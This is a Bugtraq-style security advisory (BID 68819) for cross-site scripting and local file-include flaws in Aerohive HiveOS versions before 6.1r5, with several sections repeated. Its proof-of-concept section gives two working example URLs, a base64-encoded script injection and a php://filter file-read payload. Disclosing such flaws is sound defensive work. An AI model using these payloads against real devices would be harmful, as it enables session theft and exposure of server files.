Aerohive HiveOS Cross Site Scripting and Local File Include Vulnerabilities
BID:68819
Info
Aerohive HiveOS Cross Site Scripting and Local File Include Vulnerabilities
| Bugtraq ID: | 68819 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 12 2014 12:00AM |
| Updated: | Jul 12 2014 12:00AM |
| Credit: | DearBytes |
| Vulnerable: |
Aerohive HiveOS 5.1r5 Aerohive HiveOS 0 |
| Not Vulnerable: |
Aerohive HiveOS 6.1r5 |
Discussion
Aerohive HiveOS Cross Site Scripting and Local File Include Vulnerabilities
Aerohive HiveOS is prone to a cross-site scripting vulnerability and a local file-include vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
Versions prior to HiveOS 6.1r5 are vulnerable.
Aerohive HiveOS is prone to a cross-site scripting vulnerability and a local file-include vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
Versions prior to HiveOS 6.1r5 are vulnerable.
Exploit / POC
Aerohive HiveOS Cross Site Scripting and Local File Include Vulnerabilities
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
http://www.example.com/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+
http://www.example.com/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP
An attacker can exploit these issues through a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
http://www.example.com/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+
http://www.example.com/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP
Solution / Fix
Aerohive HiveOS Cross Site Scripting and Local File Include Vulnerabilities
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
Aerohive HiveOS Cross Site Scripting and Local File Include Vulnerabilities
References:
References:
- Aerohive - Homepage (Aerohive)